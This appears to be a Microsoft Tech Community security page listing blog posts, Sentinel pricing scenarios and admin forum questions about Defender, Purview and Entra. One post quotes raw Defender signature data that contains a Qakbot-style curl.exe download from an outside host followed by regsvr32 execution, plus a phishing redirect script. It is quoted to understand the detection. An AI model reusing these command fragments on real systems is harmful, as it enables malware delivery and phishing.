Security and AI Essentials
Protect your organization with AI-powered, end-to-end security.
Defend Against Threats
Get ahead of threat actors with integrated solutions.
Secure All Your Clouds
Protection from code to runtime.
Secure All Access
Secure access for any identity, anywhere, to any resource.
Protect Your Data
Comprehensive data security across your entire estate.
Recent Blogs
It’s Time To Act
Microsoft's Digital Defense Report 2025 clearly describes the cyber threat landscape that this guidance is situated in, one that has become more complex, more industrialized, and i...
Dec 02, 202557Views
1like
0Comments
What's new in Defender for Cloud?
Defender for Cloud integrates into the Defender portal as part of the broader Microsoft Security ecosystem, now in public preview. This integration, while adding ...
Dec 01, 2025148Views
1like
0Comments
1.0 Introduction
Cloud storage stands at the core of AI-driven applications, making its security more vital than ever. As generative AI continues to drive innovation, protecting the storage infrast...
Dec 01, 202597Views
1like
0Comments
Ignite 2025 delivered groundbreaking innovations for securing the agentic era—where AI agents transform how we work and collaborate. If you missed the live sessions, news announcements, or want to di...
Dec 01, 2025171Views
0likes
0Comments
Recent Discussions
How to stop incidents merging under new incident (MultiStage) in defender.
Dear All We are experiencing a challenge with the integration between Microsoft Sentinel and the Defender portal where multiple custom rule alerts and analytic rule incidents are being automatically merged into a single incident named "Multistage." This automatic incident merging affects the granularity and context of our investigations, especially for important custom use cases such as specific admin activities and differentiated analytic logic. Key concerns include: Custom rule alerts from Sentinel merging undesirably into a single "Multistage" incident in Defender, causing loss of incident-specific investigation value. Analytic rules arising from different data sources and detection logic are merged, although they represent distinct security events needing separate attention. Customers require and depend on distinct, non-merged incidents for custom use cases, and the current incident correlation and merging behavior undermines this requirement. We understand that Defender’s incident correlation engine merges incidents based on overlapping entities, timelines, and behaviors but would like guidance or configuration best practices to disable or minimize this automatic merging behavior for our custom and analytic rule incidents. Our goal is to maintain independent incidents corresponding exactly to our custom alerts so that hunting, triage, and response workflows remain precise and actionable. Any recommendations or advanced configuration options to achieve this separation would be greatly appreciated. Thank you for your assistance. Best regardsBlock all 365 apps except Outlook via CA
Trying to block 365 for a subset of users, except email. The old app-based CA rules made this easy. The new 'resource' based setup... I'm not even sure if it's possible. CoPilot just keeps telling me to use the old version of CA, because it hasn't clued into Microsoft's downgrade cycle. If I try to filter by resource attribute, I'm told I don't have permission to do so. I'm the global admin. Here's what searching for Outlook gives me and Exchange Advice? We ARE intune licensed, but i'm not sure App Protection Policies will help here. The intention is to block BYOD from accessing anything but Outlook / Exchange. That is, Mobile devices that aren't (whatever param I decide on)Microsoft Purview Roles for Data Consumers in a Data Mesh & Data Democratisation Environment
Reformatted Discussion for Community Feedback Recommended Microsoft Purview Roles for Data Consumers in a Data Mesh & Data Democratisation Environment I’m seeking guidance on whether the following set of Microsoft Purview roles is appropriate for typical data consumers within a Data Mesh-aligned organisation. The approach aims to support data democratisation while maintaining least-privilege access. Data consumers (All users) would be placed into a dedicated security group assigned to these roles, ensuring they have the best possible search experience across the Microsoft Purview Unified Catalogue, Data Map, and Data Health features. Unified Catalog Settings Global Catalog Reader Provides read-only visibility of all catalogued assets across the organisation. This role supports governance, compliance, and data discovery without granting modification rights. Using Global Catalog Reader simplifies onboarding and improves usability by giving users a consistent view of published business concepts and data products across all governance domains. Without it, visibility must be managed domain by domain through roles such as Governance Domain Reader or Local Catalog Reader, which increases administrative effort and limits discoverability. Sensitive domains can still apply additional scoped roles where required. Data Health Reader Allows users to view data health metrics such as completeness, freshness, and anomaly indicators. This supports data stewards, quality teams, and analysts in monitoring reliability without the ability to change data or rules. Unified Catalog Governance Domain Roles Data Quality Reader Provides insight into data quality rules and results within a governance domain. Useful for users who need to understand quality issues or compliance status without editing capabilities. Data Profile Reader (Conditional) Enables access to profiling information such as distributions, null counts, and detected patterns. However, profiling data may reveal sensitive information, so this role is best reserved for trusted analysts or stewards rather than being broadly granted to all data consumers. Data Map Role Assignments Data Reader Grants read-only access to metadata and lineage across the data map. This transparency is important for impact assessments, understanding dependencies, and supporting governance processes. Insights Reader Provides access to Purview Insights dashboards, including usage statistics, scanning activity, and classification trends. This role is typically valuable for managers or governance leads monitoring adoption and compliance. Summary Together, these roles aim to give data consumers the access they need for discovery, quality awareness, and understanding lineage; without exposing sensitive data or granting any capability to modify assets. The intention is to follow least-privilege practice while enabling meaningful self-service analytics.26Views0likes0CommentsMDE use of Certificate based IoC not working
I have been trying to use MDE IoC with certificates as per the following link: https://learn.microsoft.com/en-us/defender-endpoint/indicator-certificates#create-an-indicator-for-certificates-from-the-settings-page This is on a demo tenant with full M365 E5 licenses and vulnerability trial enabled just in case. Test devices are: windows 11 with latest updates - domain joined and managed by Intune MDE onboarded and active with AV Network protection in block mode Cloud delivered protection enabled File hash enabled In defender portal - settings - endpoints advanced settings - all options enabled I am testing with Firefox - the installer and the application .exe after installation. I have extracted the leaf certificate from both these .exe's using the helpful information in the following link: https://www.linkedin.com/pulse/microsoft-defender-missing-manual-how-actually-create-adair-collins-paiye/ Then uploaded the certs into defender portal - settings - endpoints - IoC - certificates - set to Block and remediate Issue: Its been 24h and nothing happens on the client devices. In the defender portal - assets - devices - device timeline - I can see the firefox processes but at no point is the installer or application blocked. Have I miss understood how the feature works? Has anyone else managed to get this to work? Advice appreciated. Thanks WarrenSensitivity Labels and CoPilot - "No AI"
As a Purview Administrator, I recently received a request that might resonate with many of you: add a “No AI” designation to every sublabel we have. Why? Because our contracts and EULAs explicitly state that certain documents must not be used with AI tools. This raises an important question: What’s the best way to implement this without creating unnecessary complexity? The Challenge If we simply append “NoAI” to every existing label and sublabel, we end up duplicating our entire labeling structure. For example, if you follow Microsoft’s guidance on default sensitivity labels and policies, doing this “times two” for every label and sublabel is clearly not scalable. How do you deploy it? Best regards Stephan54Views2likes1CommentIdentityLogonEvents - IsNtlmV1
Hi, I cannot find documentation on how the IdentityLogonEvents table's AdditionalFields.IsNtlmV1 populated. In a demo environment, I intentionally "enforced" NTLMv1 and made an NTLMv1 connection to a domain controller. On the DC's Security log, event ID 4624 shows correct info: Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): NTLM V1 Key Length: 128 On MDI side however it looks like this: (using the following KQL to display relevant info here: IdentityLogonEvents | where ReportId == @"f70dbd37-af8e-4e4e-a77d-b4250f9e0d0b" | extend todynamic(AdditionalFields) | project TimeGenerated, ActionType, Application, LogonType, Protocol,IsNtlmV1 = AdditionalFields.IsNtlmV1 ) TimeGenerated ActionType Application LogonType Protocol IsNtlmV1 Nov 28, 2025 10:43:05 PM LogonSuccess Active Directory Credentials validation Ntlm false Can someone please explain, under which circumstances will the IsNtlmV1 property become "true"? Thank you in advanceNetworkSignatureInspected
Hi, Whilst looking into something, I was thrown off by a line in a device timeline export, with ActionType of NetworkSignatureInspected, and the content. I've read this article, so understand the basics of the function: Enrich your advanced hunting experience using network layer signals from Zeek I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices. Can anyone provide any clarity on the contents of AdditionalFields, where the ActionType is NetworkSignatureInspected, references for example CVE-2021-44228: ${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&®svr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https:// Defender reports no issues on the device and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced. Any assistance with rationalising this would be great, thanks.DLP Rule for Exchange using ExceptIfRecipientDomainIs not working any more
Hello, we had setup a DLP Rule for Exchange workloads that only allows sending to specific external recipients in a list we provide via populating the ExceptIfRecipientDomainIs attribute. This has been working fine until a few days back, when suddenly the rule was failing to apply on end users (domain is listed in the Rule's ExceptIfRecipientDomainIs) and email gets blocked. I then realized that the attribute is not populated anymore via Powershell and comes back empty! (Get-DlpComplianceRule -Identity "DLPRULE").ExceptIfRecipientDomainIs At the same time, the Rule on the compliance.microsoft.com portal shows up properly with the domains in question. I then noticed that those domains now only appear under the AdvancedRule attribute only. (Get-DlpComplianceRule -Identity "DLPRULE") | select -expand advancedrule So it seems there has been some change in DLP rules by the compliance team at Microsoft?1.8KViews0likes3CommentsBreak-glass Account Prompted for Authenticator App Despite Exclusions
We have a break-glass account configured with two FIDO2 security keys as the only authentication method. The account is: Excluded from Microsoft Authenticator in Authentication Methods policy Also, the included target is a dynamic group that includes all users but the break glass account. Excluded from the MFA Registration Campaign Also, the included target is a dynamic group that includes all users but the break glass account. Excluded from all Conditional Access policies However, whenever we test the account, it still gets prompted to set up the Microsoft Authenticator app during sign-in. We can skip the setup, but ideally, the prompt should not appear for this account. How can we prevent the Authenticator setup prompt entirely for this break-glass account?46Views0likes2CommentsWhat are the prerequisites to see Microsoft Secure Score?
My teammate says that even Basic or Standard M365 license provides Secure Score. Which is kind of right as you can see a basic score when opening a tenant in Lighthouse. But if you try to go to Defender console and then Exposure menu and press on Secure Score, it won't load with just Standard/Basic licenses assigned to users. I have tried to find a definitive list, but i can't. Copilot said you need at least Premium Business or E3/E5 or Defender P1. Which seems to make sense. But i need a confirmation. And also why do i see some score on tenant's page in Lighthouse?Issue with the Canadian Drivers License SIT
Did any face an issue with the Canadian Driver's License SIT in the DLP policy? We see a lot of false positives especially around BC province number, NB, PrinceEdward Island and Saskatchewan. These provinces has just digits which can flag any kind of digits. Even if we use some custom RegEx and reduced keyword list, it still flags a lot of false positives. We see this as more and more customers are not happy with it. Has anyone found a breakthrough or best solution for deploying the Canadian Driver's License DLP?sensor service fails to start
Hello, i've installed MDI on all of our domain controllers and everything went fine. I am trying to install MDI our Entra connect server and our certificate authority server (which are not domain controllers) and the service is continually failing to start. Could someone please point me in the right direction on how to rectify this? I've tried: recreating the service account (3x), checking the service account with Test-ADServiceAccount (works fine from both member servers) verified the service account is given the right to log on as service. The error log is very vague: 2025-11-13 19:05:30.0968 Error DirectoryServicesClient+<CreateLdapConnectionAsync>d__49 Microsoft.Tri.Infrastructure.ExtendedException: CreateLdapConnectionAsync failed [DomainControllerDnsName={FQDN of DC}] at async Task<LdapConnection> Microsoft.Tri.Sensor.DirectoryServicesClient.CreateLdapConnectionAsync(DomainControllerConnectionData domainControllerConnectionData, bool isGlobalCatalog, bool isTraversing) at async Task<bool> Microsoft.Tri.Sensor.DirectoryServicesClient.TryCreateLdapConnectionAsync(DomainControllerConnectionData domainControllerConnectionData, bool isGlobalCatalog, bool isTraversing) 2025-11-13 19:05:30.1124 Error DirectoryServicesClient Microsoft.Tri.Infrastructure.ExtendedException: Failed to communicate with configured domain controllers [ _domainControllerConnectionDatas={FQDN of DC}] at new Microsoft.Tri.Sensor.DirectoryServicesClient(IConfigurationManager configurationManager, IDirectoryServicesDomainNetworkCredentialsManager domainNetworkCredentialsManager, IDomainTrustMappingManager domainTrustMappingManager, IRemoteImpersonationManager remoteImpersonationManager, IMetricManager metricManager, IWorkspaceApplicationSensorApiJsonProxy workspaceApplicationSensorApiJsonProxy) at object lambda_method(Closure, object[]) at object Autofac.Core.Activators.Reflection.ConstructorParameterBinding.Instantiate() at void Microsoft.Tri.Infrastructure.ModuleManager.AddModules(Type[] moduleTypes) at new Microsoft.Tri.Sensor.SensorModuleManager() at ModuleManager Microsoft.Tri.Sensor.SensorService.CreateModuleManager() at async Task Microsoft.Tri.Infrastructure.Service.OnStartAsync() at void Microsoft.Tri.Infrastructure.TaskExtension.Await(Task task) at void Microsoft.Tri.Infrastructure.Service.OnStart(string[] args)245Views0likes5CommentsUnderstand New Sentinel Pricing Model with Sentinel Data Lake Tier
Introduction on Sentinel and its New Pricing Model Microsoft Sentinel is a cloud-native Security Information and Event Management (SIEM) and Security Orchestration, Automation, and Response (SOAR) platform that collects, analyzes, and correlates security data from across your environment to detect threats and automate response. Traditionally, Sentinel stored all ingested data in the Analytics tier (Log Analytics workspace), which is powerful but expensive for high-volume logs. To reduce cost and enable customers to retain all security data without compromise, Microsoft introduced a new dual-tier pricing model consisting of the Analytics tier and the Data Lake tier. The Analytics tier continues to support fast, real-time querying and analytics for core security scenarios, while the new Data Lake tier provides very low-cost storage for long-term retention and high-volume datasets. Customers can now choose where each data type lands—analytics for high-value detections and investigations, and data lake for large or archival types—allowing organizations to significantly lower cost while still retaining all their security data for analytics, compliance, and hunting. Please flow diagram depicts new sentinel pricing model: Now let's understand this new pricing model with below scenarios: Scenario 1A (PAY GO) Scenario 1B (Usage Commitment) Scenario 2 (Data Lake Tier Only) Scenario 1A (PAY GO) Requirement Suppose you need to ingest 10 GB of data per day, and you must retain that data for 2 years. However, you will only frequently use, query, and analyze the data for the first 6 months. Solution To optimize cost, you can ingest the data into the Analytics tier and retain it there for the first 6 months, where active querying and investigation happen. After that period, the remaining 18 months of retention can be shifted to the Data Lake tier, which provides low-cost storage for compliance and auditing needs. But you will be charged separately for data lake tier querying and analytics which depicted as Compute (D) in pricing flow diagram. Pricing Flow / Notes The first 10 GB/day ingested into the Analytics tier is free for 31 days under the Analytics logs plan. All data ingested into the Analytics tier is automatically mirrored to the Data Lake tier at no additional ingestion or retention cost. For the first 6 months, you pay only for Analytics tier ingestion and retention, excluding any free capacity. For the next 18 months, you pay only for Data Lake tier retention, which is significantly cheaper. Azure Pricing Calculator Equivalent Assuming no data is queried or analyzed during the 18-month Data Lake tier retention period: Although the Analytics tier retention is set to 6 months, the first 3 months of retention fall under the free retention limit, so retention charges apply only for the remaining 3 months of the analytics retention window. Azure pricing calculator will adjust accordingly. Scenario 1B (Usage Commitment) Now, suppose you are ingesting 100 GB per day. If you follow the same pay-as-you-go pricing model described above, your estimated cost would be approximately $15,204 per month. However, you can reduce this cost by choosing a Commitment Tier, where Analytics tier ingestion is billed at a discounted rate. Note that the discount applies only to Analytics tier ingestion—it does not apply to Analytics tier retention costs or to any Data Lake tier–related charges. Please refer to the pricing flow and the equivalent pricing calculator results shown below. Monthly cost savings: $15,204 – $11,184 = $4,020 per month Now the question is: What happens if your usage reaches 150 GB per day? Will the additional 50 GB be billed at the Pay-As-You-Go rate? No. The entire 150 GB/day will still be billed at the discounted rate associated with the 100 GB/day commitment tier bucket. Azure Pricing Calculator Equivalent (100 GB/ Day) Azure Pricing Calculator Equivalent (150 GB/ Day) Scenario 2 (Data Lake Tier Only) Requirement Suppose you need to store certain audit or compliance logs amounting to 10 GB per day. These logs are not used for querying, analytics, or investigations on a regular basis, but must be retained for 2 years as per your organization’s compliance or forensic policies. Solution Since these logs are not actively analyzed, you should avoid ingesting them into the Analytics tier, which is more expensive and optimized for active querying. Instead, send them directly to the Data Lake tier, where they can be retained cost-effectively for future audit, compliance, or forensic needs. Pricing Flow Because the data is ingested directly into the Data Lake tier, you pay both ingestion and retention costs there for the entire 2-year period. If, at any point in the future, you need to perform advanced analytics, querying, or search, you will incur additional compute charges, based on actual usage. Even with occasional compute charges, the cost remains significantly lower than storing the same data in the Analytics tier. Realized Savings Scenario Cost per Month Scenario 1: 10 GB/day in Analytics tier $1,520.40 Scenario 2: 10 GB/day directly into Data Lake tier $202.20 (without compute) $257.20 (with sample compute price) Savings with no compute activity: $1,520.40 – $202.20 = $1,318.20 per month Savings with some compute activity (sample value): $1,520.40 – $257.20 = $1,263.20 per month Azure calculator equivalent without compute Azure calculator equivalent with Sample Compute Conclusion The combination of the Analytics tier and the Data Lake tier in Microsoft Sentinel enables organizations to optimize cost based on how their security data is used. High-value logs that require frequent querying, real-time analytics, and investigation can be stored in the Analytics tier, which provides powerful search performance and built-in detection capabilities. At the same time, large-volume or infrequently accessed logs—such as audit, compliance, or long-term retention data—can be directed to the Data Lake tier, which offers dramatically lower storage and ingestion costs. Because all Analytics tier data is automatically mirrored to the Data Lake tier at no extra cost, customers can use the Analytics tier only for the period they actively query data, and rely on the Data Lake tier for the remaining retention. This tiered model allows different scenarios—active investigation, archival storage, compliance retention, or large-scale telemetry ingestion—to be handled at the most cost-effective layer, ultimately delivering substantial savings without sacrificing visibility, retention, or future analytical capabilities.Convert Group Source of Authority to the cloud. Global Groups support?!
This is the exact feature we need, unfortunately it's also unusable for an existing environment. Does anyone know when Entra SOA will support global groups? We have ZERO universal groups and we are not going to convert into them.14Views0likes0CommentsOnenote Files used in Malware attacks
Hi Folks, Any comments or recommendations regarding the increase of attacks via onenote files as noted in the below articles? I'm seeing a increased number of recommendations for blocking .one and .onepkg mail attachments. One issue is onepkg files currently cannot be added to the malware filter. https://www.securityweek.com/microsoft-onenote-abuse-for-malware-delivery-surges/ https://labs.withsecure.com/publications/detecting-onenote-abuse B JoshuaSolvedDowngrading of encrypted label (User defined permission) in SPO to Desktop app
Hi I have a file stored in SharePoint that was originally labeled Restricted with user-defined encryption. When I open the word file from SharePoint using a desktop Office application and downgrade the label to Internal, the original encryption and permissions are still retained. This issue occurs only when opening the file from SharePoint into the desktop app—the previous protection settings persist even though the sensitivity label correctly updates to Internal. I’ve attached a screenshot for reference. Is there any official Microsoft documentation that explains why this behavior occurs and the underlying reason for it? Additionally, what is the recommended workaround if I want to fully remove user-defined permissions when downgrading the label? I have already tried reapplying the Internal label, but the file remains encrypted with the prior permissions.SolvedLabels not showing up in office installed on clients
Hi, We have a case where we published labels to a customer from Purview. The labels are visible in the online Office applications, but they do not appear in the desktop client. The labels were published several weeks ago. The CLP folder on-premises exists, and when we open the file, we can see that it connects to Purview—the label names are visible in the XML file. Does anyone have any idea what we should check? What could be causing this issue? Why are the labels not showing up? We have an ongoing ticket with Microsoft, but it’s taking time.Solved78Views0likes2CommentsTenant-based Microsoft Defender for Cloud Connector
As the title states the connector is connect but no alerts show in Sentinel. Alerts are in Defender for Cloud they do not show in Sentinel. Data connector is connected, law exports are configured to send to law rg. What's missing?172Views0likes5Comments